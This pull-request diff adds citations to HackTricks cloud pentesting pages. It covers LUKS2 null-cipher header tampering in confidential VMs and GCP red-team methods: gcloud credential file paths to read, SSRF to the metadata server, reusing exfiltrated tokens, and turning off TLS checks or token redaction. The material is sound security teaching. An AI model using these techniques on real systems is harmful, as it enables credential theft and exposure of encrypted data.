### PR TITLE
Add provenance citations to cloud pages 51-100

### DIFF
--- a/src/pentesting-cloud/confidential-computing/luks2-header-malleability-null-cipher-abuse.md
+++ b/src/pentesting-cloud/confidential-computing/luks2-header-malleability-null-cipher-abuse.md
@@ -4,20 +4,20 @@
 
 ## TL;DR
 
-- Many Linux-based Confidential VMs (CVMs) running on AMD SEV-SNP or Intel TDX use LUKS2 for persistent storage. The on-disk LUKS2 header is malleable and not integrity-protected against storage-adjacent attackers.
-- If the header’s data segment encryption is set to a null cipher (e.g., "cipher_null-ecb"), cryptsetup accepts it and the guest transparently reads/writes plaintext while believing the disk is encrypted.
-- Prior to and including cryptsetup 2.8.0, null ciphers could be used for keyslots; since 2.8.1 they are rejected for keyslots with non-empty passwords, but null ciphers remain allowed for volume segments.
-- Remote attestation usually measures VM code/config, not mutable external LUKS headers; without explicit validation/measurement, an attacker with disk write access can force plaintext I/O.
+- Many Linux-based Confidential VMs (CVMs) running on AMD SEV-SNP or Intel TDX use LUKS2 for persistent storage. The on-disk LUKS2 header is malleable and not integrity-protected against storage-adjacent attackers. <sup>[[1]](#references)[[3]](#references)</sup>
+- If the header’s data segment encryption is set to a null cipher (e.g., "cipher_null-ecb"), cryptsetup accepts it and the guest transparently reads/writes plaintext while believing the disk is encrypted. <sup>[[1]](#references)</sup>
+- Prior to and including cryptsetup 2.8.0, null ciphers could be used for keyslots; since 2.8.1 they are rejected for keyslots with non-empty passwords, but null ciphers remain allowed for volume segments. <sup>[[1]](#references)[[7]](#references)</sup>
+- Remote attestation usually measures VM code/config, not mutable external LUKS headers; without explicit validation/measurement, an attacker with disk write access can force plaintext I/O. <sup>[[1]](#references)</sup>
 
 ## Background: LUKS2 on-disk format (what matters for attackers)
 
-- A LUKS2 device starts with a header followed by encrypted data.
-- The header contains two identical copies of a binary section and a JSON metadata section, plus one or more keyslots.
+- A LUKS2 device starts with a header followed by encrypted data. <sup>[[1]](#references)[[6]](#references)</sup>
+- The header contains two identical copies of a binary section and a JSON metadata section, plus one or more keyslots. <sup>[[1]](#references)[[6]](#references)</sup>
 - JSON metadata defines:
   - keyslots enabled and their wrapping KDF/cipher
   - segments that describe the data area (cipher/mode)
-  - digests (e.g., hash of the volume key to verify passphrases)
-- Typical secure values: keyslot KDF argon2id; keyslot and data segment encryption aes-xts-plain64.
+  - digests (e.g., hash of the volume key to verify passphrases) <sup>[[1]](#references)[[6]](#references)</sup>
+- Typical secure values: keyslot KDF argon2id; keyslot and data segment encryption aes-xts-plain64. <sup>[[1]](#references)</sup>
 
 Quickly inspect the segment cipher directly from JSON:
 
@@ -29,15 +29,15 @@ cryptsetup luksDump --type luks2 --dump-json-metadata /dev/VDISK \
 
 ## Root cause
 
-- LUKS2 headers are not authenticated against storage tampering. A host/storage attacker can rewrite the JSON metadata accepted by cryptsetup.
-- As of cryptsetup 2.8.0, headers that set a segment’s encryption to cipher_null-ecb are accepted. The null cipher ignores keys and returns plaintext.
-- Up to 2.8.0, null ciphers could also be used for keyslots (keyslot opens with any passphrase). Since 2.8.1, null ciphers are rejected for keyslots with non-empty passwords, but remain allowed for segments. Switching only the segment cipher still yields plaintext I/O post-2.8.1.
+- LUKS2 headers are not authenticated against storage tampering. A host/storage attacker can rewrite the JSON metadata accepted by cryptsetup. <sup>[[1]](#references)[[3]](#references)</sup>
+- As of cryptsetup 2.8.0, headers that set a segment’s encryption to cipher_null-ecb are accepted. The null cipher ignores keys and returns plaintext. <sup>[[1]](#references)</sup>
+- Up to 2.8.0, null ciphers could also be used for keyslots (keyslot opens with any passphrase). Since 2.8.1, null ciphers are rejected for keyslots with non-empty passwords, but remain allowed for segments. Switching only the segment cipher still yields plaintext I/O post-2.8.1. <sup>[[1]](#references)[[2]](#references)[[4]](#references)[[7]](#references)</sup>
 
 ## Threat model: why attestation didn’t save you by default
 
-- CVMs aim to ensure confidentiality, integrity, and authenticity in an untrusted host.
-- Remote attestation usually measures the VM image and launch configuration, not the mutable LUKS header living on untrusted storage.
-- If your CVM trusts an on-disk header without robust validation/measurement, a storage attacker can alter it to a null cipher and your guest will mount a plaintext volume without error.
+- CVMs aim to ensure confidentiality, integrity, and authenticity in an untrusted host. <sup>[[1]](#references)</sup>
+- Remote attestation usually measures the VM image and launch configuration, not the mutable LUKS header living on untrusted storage. <sup>[[1]](#references)</sup>
+- If your CVM trusts an on-disk header without robust validation/measurement, a storage attacker can alter it to a null cipher and your guest will mount a plaintext volume without error. <sup>[[1]](#references)[[3]](#references)</sup>
 
 ## Exploitation (storage write access required)
 
@@ -46,16 +46,16 @@ Preconditions:
 - The guest uses the on-disk LUKS2 header without robust validation/attestation.
 
 Steps (high level):
-1) Read the header JSON and identify the data segment definition. Example target field: segments["0"].encryption.
-2) Set the data segment encryption to a null cipher, e.g., cipher_null-ecb. Keep keyslot parameters and digest structure intact so the guest’s usual passphrase still “works.”
-3) Update both header copies and associated header digests so the header is self-consistent.
-4) On next boot, the guest runs cryptsetup, successfully unlocks the existing keyslot with its passphrase, and mounts the volume. Because the segment cipher is a null cipher, all reads/writes are plaintext.
+1) Read the header JSON and identify the data segment definition. Example target field: segments["0"].encryption. <sup>[[1]](#references)</sup>
+2) Set the data segment encryption to a null cipher, e.g., cipher_null-ecb. Keep keyslot parameters and digest structure intact so the guest’s usual passphrase still “works.” <sup>[[1]](#references)</sup>
+3) Update both header copies and associated header digests so the header is self-consistent. <sup>[[1]](#references)[[6]](#references)</sup>
+4) On next boot, the guest runs cryptsetup, successfully unlocks the existing keyslot with its passphrase, and mounts the volume. Because the segment cipher is a null cipher, all reads/writes are plaintext. <sup>[[1]](#references)[[3]](#references)</sup>
 
-Variant (pre-2.8.1 keyslot abuse): if a keyslot’s area.encryption is a null cipher, it opens with any passphrase. Combine with a null segment cipher for seamless plaintext access without knowing the guest secret.
+Variant (pre-2.8.1 keyslot abuse): if a keyslot’s area.encryption is a null cipher, it opens with any passphrase. Combine with a null segment cipher for seamless plaintext access without knowing the guest secret. <sup>[[1]](#references)[[2]](#references)[[7]](#references)</sup>
 
 ## Robust mitigations (avoid TOCTOU with detached headers)
 
-Always treat on-disk LUKS headers as untrusted input. Use detached-header mode so validation and opening use the same trusted bytes from protected RAM:
+Always treat on-disk LUKS headers as untrusted input. Use detached-header mode so validation and opening use the same trusted bytes from protected RAM: <sup>[[1]](#references)[[6]](#references)</sup>
 
 ```bash
 # Copy header into protected memory (e.g., tmpfs) and open from there
@@ -68,10 +68,10 @@ Then enforce one (or more) of:
 1) MAC the full header
    - Compute/verify a MAC over the entire header prior to use.
    - Only open the volume when the MAC verifies.
-   - Examples in the wild: Flashbots tdx-init and Fortanix Salmiac adopted MAC-based verification.
+   - Examples in the wild: Flashbots tdx-init and Fortanix Salmiac adopted MAC-based verification. <sup>[[8]](#references)[[9]](#references)[[1]](#references)</sup>
 
 2) Strict JSON validation (backward compatible)
-   - Dump JSON metadata and validate a strict allowlist of parameters (KDF, ciphers, segment count/type, flags).
+   - Dump JSON metadata and validate a strict allowlist of parameters (KDF, ciphers, segment count/type, flags). <sup>[[1]](#references)</sup>
 
 ```bash
 #!/bin/bash
@@ -118,16 +118,17 @@ if "flags" in header["segments"]["0"] and header["segments"]["0"]["flags"]:
 
 3) Measure/attest the header
    - Remove random salts/digests and measure the sanitized header into TPM/TDX/SEV PCRs or KMS policy state.
-   - Release decryption keys only when the measured header matches an approved, safe profile.
+   - Release decryption keys only when the measured header matches an approved, safe profile. <sup>[[1]](#references)</sup>
 
 Operational guidance:
-- Enforce detached header + MAC or strict validation; never trust on-disk headers directly.
-- Consumers of attestation should deny pre-patch framework versions in allow-lists.
+- Enforce detached header + MAC or strict validation; never trust on-disk headers directly. <sup>[[1]](#references)</sup>
+- Consumers of attestation should deny pre-patch framework versions in allow-lists. <sup>[[1]](#references)</sup>
 
 ## Notes on versions and maintainer position
 
-- cryptsetup maintainers clarified that LUKS2 was not designed to provide integrity against storage tampering in this setting; null ciphers are retained for backward compatibility.
-- cryptsetup 2.8.1 (Oct 19, 2025) rejects null ciphers for keyslots with non-empty passwords but still allows null ciphers for segments.
+- cryptsetup maintainers clarified that LUKS2 was not designed to provide integrity against storage tampering in this setting; null ciphers are retained for backward compatibility. <sup>[[1]](#references)[[2]](#references)</sup>
+- cryptsetup 2.8.1 (Oct 19, 2025) rejects null ciphers for keyslots with non-empty passwords but still allows null ciphers for segments. <sup>[[1]](#references)[[7]](#references)</sup>
+- Related context: CVE-2021-4122 showed that a crafted LUKS2 header could trick cryptsetup’s reencryption-recovery path into disabling encryption; it is a separate failure mode from null-cipher abuse. <sup>[[5]](#references)</sup>
 
 ## Quick checks and triage
 
@@ -142,10 +143,14 @@ cryptsetup luksDump --type luks2 --dump-json-metadata /dev/VDISK \
 
 ## References
 
-- [Vulnerabilities in LUKS2 disk encryption for confidential VMs (Trail of Bits)](https://blog.trailofbits.com/2025/10/30/vulnerabilities-in-luks2-disk-encryption-for-confidential-vms/)
-- [cryptsetup issue #954 (null cipher acceptance and integrity considerations)](https://gitlab.com/cryptsetup/cryptsetup/-/issues/954)
-- [CVE-2025-59054](https://nvd.nist.gov/vuln/detail/CVE-2025-59054)
-- [CVE-2025-58356](https://nvd.nist.gov/vuln/detail/CVE-2025-58356)
-- [Related context: CVE-2021-4122 (auto-recovery path silently decrypting disks)](https://www.cve.org/CVERecord?id=CVE-2021-4122)
+- [1] [Vulnerabilities in LUKS2 disk encryption for confidential VMs (Trail of Bits)](https://blog.trailofbits.com/2025/10/30/vulnerabilities-in-luks2-disk-encryption-for-confidential-vms/)
+- [2] [cryptsetup issue #954 (null cipher acceptance and integrity considerations)](https://gitlab.com/cryptsetup/cryptsetup/-/issues/954)
+- [3] [CVE-2025-59054](https://nvd.nist.gov/vuln/detail/CVE-2025-59054)
+- [4] [CVE-2025-58356](https://nvd.nist.gov/vuln/detail/CVE-2025-58356)
+- [5] [Related context: CVE-2021-4122 (auto-recovery path silently decrypting disks)](https://www.cve.org/CVERecord?id=CVE-2021-4122)
+- [6] [LUKS2 on-disk format specification (cryptsetup)](https://gitlab.com/cryptsetup/LUKS2-docs/-/blob/main/luks2_doc.tex)
+- [7] [Add the same cipher_null restriction to LUKS2 keyslot as in LUKS1 (!837)](https://gitlab.com/cryptsetup/cryptsetup/-/merge_requests/837)
+- [8] [tdx-init v0.2.0: MAC for the LUKS header](https://github.com/flashbots/tdx-init/releases/tag/v0.2.0)
+- [9] [Fortanix Salmiac: authenticate the detached LUKS2 header (#53)](https://github.com/fortanix/salmiac/pull/53)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/README.md
+++ b/src/pentesting-cloud/gcp-security/README.md
@@ -21,7 +21,7 @@ gcp-basic-information/
 
 ## GCP Pentester/Red Team Methodology
 
-In order to audit a GCP environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal GCP services an **external services** connected.
+In order to audit a GCP environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal GCP services an **external services** connected.<sup>[[1]](#references)</sup>
 
 From a Red Team point of view, the **first step to compromise a GCP environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
 
@@ -29,7 +29,7 @@ From a Red Team point of view, the **first step to compromise a GCP environment*
 - **Social** Engineering (Check the page [**Workspace Security**](../workspace-security/index.html))
 - **Password** reuse (password leaks)
 - Vulnerabilities in GCP-Hosted Applications
-  - [**Server Side Request Forgery**](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html) with access to metadata endpoint
+  - [**Server Side Request Forgery**](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html) with access to metadata endpoint<sup>[[3]](#references)</sup>
   - **Local File Read**
     - `/home/USERNAME/.config/gcloud/*`
     - `C:\Users\USERNAME\.config\gcloud\*`
@@ -55,7 +55,7 @@ gcp-permissions-for-a-pentest.md
 
 ### **SSRF**
 
-For more information about how to **enumerate GCP metadata** check the following hacktricks page:
+For more information about how to **enumerate GCP metadata** check the following hacktricks page:<sup>[[3]](#references)</sup>
 
 {{#ref}}
 https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
@@ -63,7 +63,7 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
 
 ### Whoami
 
-In GCP you can try several options to try to guess who you are:
+In GCP you can try several options to try to guess who you are. The examples combine gcloud's account and token commands with Google's tokeninfo endpoint for access-token diagnostics.<sup>[[4]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 #If you are inside a compromise machine
@@ -75,13 +75,19 @@ gcloud auth print-identity-token #Get info from the token
 curl -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=<token>" https://www.googleapis.com/oauth2/v1/tokeninfo
 ```
 
-You can also use the API endpoint `/userinfo` to get more info about the user:
+The examples retain the legacy tokeninfo URL from the original page; current Google Cloud documentation uses `https://oauth2.googleapis.com/tokeninfo` for access-token introspection.<sup>[[4]](#references)</sup>
+
+An identity token is distinct from an OAuth access token and is normally minted for a target audience, so use `gcloud auth print-identity-token` for an identity-token flow rather than passing its output to the access-token diagnostics above.<sup>[[4]](#references)[[8]](#references)</sup>
+
+You can also use the API endpoint `/userinfo` to get more info about the user:<sup>[[5]](#references)</sup>
 
 ```bash
 curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth $(gcloud auth print-access-token)" https://www.googleapis.com/oauth2/v1/userinfo
 
 curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth <access_token>" https://www.googleapis.com/oauth2/v1/userinfo
 ```
+
+For new integrations, retrieve the current UserInfo URL from Google's OpenID Connect discovery document and send the access token as a Bearer credential; the legacy URL and header above are preserved from the original page.<sup>[[5]](#references)</sup>
 
 ### Org Enumeration
 
@@ -92,9 +98,11 @@ gcloud resource-manager folders list --organization <org_number> # Get folders
 gcloud projects list # Get projects
 ```
 
+These commands list organizations, folders, and projects visible to the active account; folder listing requires an organization or folder parent, and project results depend on the account's permissions.<sup>[[2]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
+
 ### Principals & IAM Enumeration
 
-If you have enough permissions, **checking the privileges of each entity inside the GCP account** will help you understand what you and other identities can do and how to **escalate privileges**.
+If you have enough permissions, **checking the privileges of each entity inside the GCP account** will help you understand what you and other identities can do and how to **escalate privileges**.<sup>[[1]](#references)</sup>
 
 If you don't have enough permissions to enumerate IAM, you can **steal brute-force them** to figure them out.\
 Check **how to do the numeration and brute-forcing** in:
@@ -127,7 +135,7 @@ gcp-unauthenticated-enum-and-access/
 
 The most common way once you have obtained some cloud credentials or have compromised some service running inside a cloud is to **abuse misconfigured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
 
-Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.
+Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.<sup>[[2]](#references)[[1]](#references)</sup>
 
 {{#ref}}
 gcp-privilege-escalation/
@@ -144,7 +152,7 @@ gcp-persistence/
 ### Publicly Exposed Services
 
 While enumerating GCP services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
-As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the GCP account**.
 
 In this book you should find **information** about how to find **exposed GCP services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
 
@@ -162,10 +170,10 @@ gcp-to-workspace-pivoting/
 
 ## Automatic Tools
 
-- In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project.
-  - Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
+- In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project.<sup>[[12]](#references)</sup>
+  - Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)<sup>[[13]](#references)</sup>
 - Check **tools** that can be [**used in several clouds here**](../pentesting-cloud-methodology.md).
-- [**gcp_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP.
+- [**gcp_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP.<sup>[[14]](#references)</sup>
 
 ```bash
 # Install
@@ -178,9 +186,11 @@ pip install -r requirements.txt
 python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud"
 ```
 
-- [**gcp_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file.
-- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script).
-- [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions.
+The current gcp_scanner README documents package-based installation (`pip install gcp_scanner` and `python3 -m gcp_scanner`); verify its current usage before relying on the legacy checkout command above.<sup>[[14]](#references)</sup>
+
+- [**gcp_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file.<sup>[[15]](#references)</sup>
+- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script).<sup>[[16]](#references)</sup>
+- [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions.<sup>[[17]](#references)</sup>
 
 ## gcloud config & debug
 
@@ -199,9 +209,13 @@ gcloud auth application-default print-access-token
 gcloud components update
 ```
 
+The regular gcloud account and Application Default Credentials (ADC) stores are separate; ADC login writes credentials for client libraries, and its print command emits an access token for manual API testing.<sup>[[21]](#references)[[22]](#references)</sup>
+
 ### Capture gcloud, gsutil... network
 
-Remember that you can use the **parameter** **`--log-http`** with the **`gcloud`** cli to **print** the **requests** the tool is performing. If you don't want the logs to redact the token value use `gcloud config set log_http_redact_token false`
+Remember that you can use the **parameter** **`--log-http`** with the **`gcloud`** cli to **print** the **requests** the tool is performing. If you don't want the logs to redact the token value use `gcloud config set log_http_redact_token false`.<sup>[[1]](#references)[[18]](#references)</sup>
+
+The token-redaction property is release-dependent; confirm it is supported by the installed gcloud version before disabling it, and keep any resulting logs private.
 
 Moreover, to intercept the communication:
 
@@ -222,9 +236,11 @@ gcloud config unset auth/disable_ssl_validation
 gcloud config unset core/custom_ca_certs_file
 ```
 
+Use a custom CA when possible; disabling TLS validation removes certificate checks and should be limited to an isolated test proxy. Property names can vary by gcloud release, so inspect `gcloud topic configurations` if a setting is rejected.<sup>[[20]](#references)</sup>
+
 ### OAuth token configure in gcloud
 
-In order to **use an exfiltrated service account OAuth token from the metadata endpoint** you can just do:
+To **use an exfiltrated service account OAuth token from the metadata endpoint**, use the following commands. Google documents metadata-server OAuth access tokens for code running on a VM, and gcloud's `auth/access_token_file` property reads a file containing only the token while ignoring the active account.<sup>[[3]](#references)[[19]](#references)</sup>
 
 ```bash
 # Via env vars
@@ -238,11 +254,32 @@ gcloud projects list
 gcloud config unset auth/access_token_file
 ```
 
+The `CLOUDSDK_AUTH_ACCESS_TOKEN` form is gcloud's documented direct access-token environment variable; treat both the environment value and token file as bearer credentials and remove them after testing.<sup>[[4]](#references)[[19]](#references)[[23]](#references)</sup>
+
 ## References
 
-- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [1] [Google Cloud privilege escalation & post-exploitation tactics](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [2] [About resource hierarchy | Resource Manager | Google Cloud](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy)
+- [3] [View and query VM metadata | Compute Engine | Google Cloud](https://cloud.google.com/compute/docs/metadata/querying-metadata)
+- [4] [Token types | Authentication | Google Cloud](https://cloud.google.com/docs/authentication/token-types)
+- [5] [Google OpenID Connect API Reference](https://developers.google.com/identity/openid-connect/reference)
+- [6] [gcloud auth list | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/auth/list)
+- [7] [gcloud auth print-access-token | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/auth/print-access-token)
+- [8] [gcloud auth print-identity-token | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/auth/print-identity-token)
+- [9] [gcloud organizations list | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/organizations/list)
+- [10] [gcloud resource-manager folders list | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/resource-manager/folders/list)
+- [11] [gcloud projects list | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/projects/list)
+- [12] [Cloud Asset Inventory overview | Google Cloud](https://cloud.google.com/asset-inventory/docs/overview)
+- [13] [Asset types | Cloud Asset Inventory | Google Cloud](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
+- [14] [gcp_scanner](https://github.com/google/gcp_scanner)
+- [15] [gcp_enum](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum)
+- [16] [GCP IAM Privilege Escalation](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation)
+- [17] [Bruteforce-GCP-Permissions](https://github.com/carlospolop/bf_my_gcp_permissions)
+- [18] [gcloud | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference)
+- [19] [gcloud config | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/config)
+- [20] [Configuring the gcloud CLI for use behind a proxy/firewall](https://cloud.google.com/sdk/docs/proxy-settings)
+- [21] [gcloud auth application-default login | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login)
+- [22] [gcloud auth application-default print-access-token | Google Cloud SDK](https://cloud.google.com/sdk/gcloud/reference/auth/application-default/print-access-token)
+- [23] [Authenticate for the gcloud CLI | Google Cloud](https://cloud.google.com/sdk/docs/authenticate)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-basic-information/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-basic-information/README.md
@@ -4,7 +4,7 @@
 
 ## **Resource hierarchy**
 
-Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
+Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions. <sup>[[2]](#references)</sup>
 
 At a high level, it looks like this:
 
@@ -15,25 +15,25 @@ Organization
     --> Resources
 ```
 
-A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
+A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc. <sup>[[2]](#references)</sup>
 
 <figure><img src="../../../images/image (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption><p><a href="https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg">https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg</a></p></figcaption></figure>
 
 ## **Projects Migration**
 
-It's possible to **migrate a project without any organization** to an organization with the permissions `roles/resourcemanager.projectCreator` and `roles/resourcemanager.projectMover`. If the project is inside other organization, it's needed to contact GCP support to **move them out of the organization first**. For more info check [**this**](https://medium.com/google-cloud/migrating-a-project-from-one-organization-to-another-gcp-4b37a86dd9e6).
+It's possible to **migrate a project without any organization** to an organization with the permissions `roles/resourcemanager.projectCreator` and `roles/resourcemanager.projectMover`. If the project is inside other organization, it's needed to contact GCP support to **move them out of the organization first**. For more info check [**this**](https://medium.com/google-cloud/migrating-a-project-from-one-organization-to-another-gcp-4b37a86dd9e6). <sup>[[3]](#references)[[4]](#references)</sup>
 
 ## **Organization Policies**
 
-Allow to centralize control over your organization's cloud resources:
+Allow to centralize control over your organization's cloud resources: <sup>[[5]](#references)</sup>
 
 - Centralize control to **configure restrictions** on how your organization’s resources can be used.
 - Define and establish **guardrails** for your development teams to stay within compliance boundaries.
 - Help project owners and their teams move quickly without worry of breaking compliance.
 
-These policies can be created to **affect the complete organization, folder(s) or project(s)**. Descendants of the targeted resource hierarchy node **inherit the organization policy**.
+These policies can be created to **affect the complete organization, folder(s) or project(s)**. Descendants of the targeted resource hierarchy node **inherit the organization policy**. <sup>[[5]](#references)</sup>
 
-In order to **define** an organization policy, **you choose a** [**constraint**](https://cloud.google.com/resource-manager/docs/organization-policy/overview#constraints), which is a particular type of restriction against either a Google Cloud service or a group of Google Cloud services. You **configure that constraint with your desired restrictions**.
+In order to **define** an organization policy, **you choose a** [**constraint**](https://cloud.google.com/resource-manager/docs/organization-policy/overview#constraints), which is a particular type of restriction against either a Google Cloud service or a group of Google Cloud services. You **configure that constraint with your desired restrictions**. <sup>[[5]](#references)</sup>
 
 <figure><img src="../../../images/image (217).png" alt=""><figcaption><p><a href="https://cloud.google.com/resource-manager/img/org-policy-concepts.svg">https://cloud.google.com/resource-manager/img/org-policy-concepts.svg</a></p></figcaption></figure>
 
@@ -46,7 +46,7 @@ In order to **define** an organization policy, **you choose a** [**constraint**]
 
 <figure><img src="../../../images/image (172).png" alt=""><figcaption></figcaption></figure>
 
-There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.**
+There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.** <sup>[[7]](#references)</sup>
 
 ### **Default Organization Policies**
 
@@ -92,25 +92,29 @@ There are many more constraints that give you fine-grained control of your organ
 
 </details>
 
+The exact set enforced at organization creation depends on the organization's creation date and the applicable constraint versions, so verify the effective organization policies before relying on this list. <sup>[[6]](#references)[[7]](#references)</sup>
+
 ## **IAM Roles**
 
-These are like IAM policies in AWS as **each role contains a set of permissions.**
+These are like IAM policies in AWS as **each role contains a set of permissions.** <sup>[[8]](#references)</sup>
 
 However, unlike in AWS, there is **no centralized repo** of roles. Instead of that, **resources give X access roles to Y principals**, and the only way to find out who has access to a resource is to use the **`get-iam-policy` method over that resource**.\
-This could be a problem because this means that the only way to find out **which permissions a principal has is to ask every resource who is it giving permissions to**, and a user might not have permissions to get permissions from all resources.
+This could be a problem because this means that the only way to find out **which permissions a principal has is to ask every resource who is it giving permissions to**, and a user might not have permissions to get permissions from all resources. <sup>[[9]](#references)</sup>
+
+Current IAM allow policies are attached to resources, and effective access can also include inherited bindings from parent resources; use effective-policy views or inspect the relevant resource hierarchy when available. <sup>[[9]](#references)</sup>
 
 There are **three types** of roles in IAM:
 
 - **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
 - **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined_roles).
-- **Custom roles**, which provide granular access according to a user-specified list of permissions.
+- **Custom roles**, which provide granular access according to a user-specified list of permissions. <sup>[[8]](#references)</sup>
 
-There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it.
+There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it. <sup>[[8]](#references)</sup>
 
 You can also [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product_specific_documentation) **offered by each product.** Note that some **roles** cannot be attached to users and **only to SAs because some permissions** they contain.\
-Moreover, note that **permissions** will only **take effect** if they are **attached to the relevant service.**
+Moreover, note that **permissions** will only **take effect** if they are **attached to the relevant service.** <sup>[[8]](#references)</sup>
 
-Or check if a **custom role can use a** [**specific permission in here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
+Or check if a **custom role can use a** [**specific permission in here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.** <sup>[[8]](#references)</sup>
 
 {{#ref}}
 ../gcp-services/gcp-iam-and-org-policies-enum.md
@@ -118,11 +122,11 @@ Or check if a **custom role can use a** [**specific permission in here**](https:
 
 ## Principal Access Boundary (PAB) Policies
 
-In GCP, the closest equivalent to an **AWS IAM Permissions Boundary** is a **Principal Access Boundary (PAB) policy**.
+In GCP, the closest equivalent to an **AWS IAM Permissions Boundary** is a **Principal Access Boundary (PAB) policy**. <sup>[[10]](#references)</sup>
 
-A **PAB policy** is an IAM control that **limits the resources that a set of principals are eligible to access**. It **doesn't grant access by itself**; it acts as an additional boundary that can only further restrict what principals can do, even if IAM role bindings would otherwise allow it.
